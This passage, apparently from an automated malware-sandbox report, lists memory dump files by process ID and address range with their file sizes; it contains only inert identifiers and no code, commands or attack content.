                                                                                                Filesize

                                                                                                8KB

                                                                                              • memory/2140-221-0x0000000000000000-mapping.dmp
                                                                                              • memory/2152-183-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                Filesize

                                                                                                284KB

                                                                                              • memory/2152-185-0x0000000000401480-mapping.dmp
                                                                                              • memory/2152-187-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                Filesize

                                                                                                284KB

                                                                                              • memory/2180-203-0x0000000000000000-mapping.dmp
                                                                                              • memory/2184-241-0x0000000000000000-mapping.dmp
                                                                                              • memory/2232-233-0x0000000000000000-mapping.dmp
                                                                                              • memory/2292-246-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                                Filesize

                                                                                                72KB

                                                                                              • memory/2292-245-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2292-242-0x0000000000000000-mapping.dmp
                                                                                              • memory/2296-269-0x0000000000000000-mapping.dmp
                                                                                              • memory/2368-244-0x0000000000000000-mapping.dmp
                                                                                              • memory/2400-315-0x0000000004972000-0x0000000004973000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2400-314-0x0000000004970000-0x0000000004971000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2424-191-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                Filesize

                                                                                                3.5MB

                                                                                              • memory/2424-247-0x0000000000000000-mapping.dmp
                                                                                              • memory/2424-197-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                Filesize

                                                                                                3.5MB

                                                                                              • memory/2424-192-0x00000001401FBC30-mapping.dmp
                                                                                              • memory/2444-212-0x0000000000000000-mapping.dmp
                                                                                              • memory/2456-200-0x0000000000160000-0x0000000000180000-memory.dmp
                                                                                                Filesize

                                                                                                128KB

                                                                                              • memory/2456-193-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                Filesize

                                                                                                7.0MB

                                                                                              • memory/2456-194-0x00000001402CA898-mapping.dmp
                                                                                              • memory/2456-196-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                Filesize

                                                                                                7.0MB

                                                                                              • memory/2468-232-0x0000000000000000-mapping.dmp
                                                                                              • memory/2592-236-0x0000000000000000-mapping.dmp
                                                                                              • memory/2604-305-0x0000000000000000-mapping.dmp
                                                                                              • memory/2660-207-0x0000000000000000-mapping.dmp
                                                                                              • memory/2672-205-0x0000000000000000-mapping.dmp
                                                                                              • memory/2688-204-0x0000000000000000-mapping.dmp
                                                                                              • memory/2776-267-0x0000000000000000-mapping.dmp
                                                                                              • memory/2804-251-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                Filesize

                                                                                                48KB

                                                                                              • memory/2804-252-0x0000000000402F68-mapping.dmp
                                                                                              • memory/2868-278-0x0000000000000000-mapping.dmp
                                                                                              • memory/2868-258-0x0000000000400000-0x0000000000460000-memory.dmp
                                                                                                Filesize

                                                                                                384KB

                                                                                              • memory/2868-250-0x0000000000000000-mapping.dmp
                                                                                              • memory/2868-257-0x0000000000230000-0x0000000000239000-memory.dmp
                                                                                                Filesize

                                                                                                36KB

                                                                                              • memory/2904-295-0x0000000004952000-0x0000000004953000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2904-294-0x0000000004950000-0x0000000004951000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2904-293-0x0000000000000000-mapping.dmp
                                                                                              • memory/2940-296-0x0000000000000000-mapping.dmp
                                                                                              • memory/2940-297-0x0000000004A30000-0x0000000004A31000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2940-298-0x0000000004A32000-0x0000000004A33000-memory.dmp
                                                                                                Filesize

                                                                                                4KB

                                                                                              • memory/2952-237-0x0000000000000000-mapping.dmp
                                                                                              • memory/3008-218-0x0000000000000000-mapping.dmp
                                                                                              • memory/3044-240-0x0000000000000000-mapping.dmp
                                                                                              • memory/3052-254-0x0000000000220000-0x000000000022C000-memory.dmp
                                                                                                Filesize

                                                                                                48KB

                                                                                              • memory/3052-248-0x0000000000000000-mapping.dmp
                                                                                              • memory/3060-202-0x0000000000000000-mapping.dmp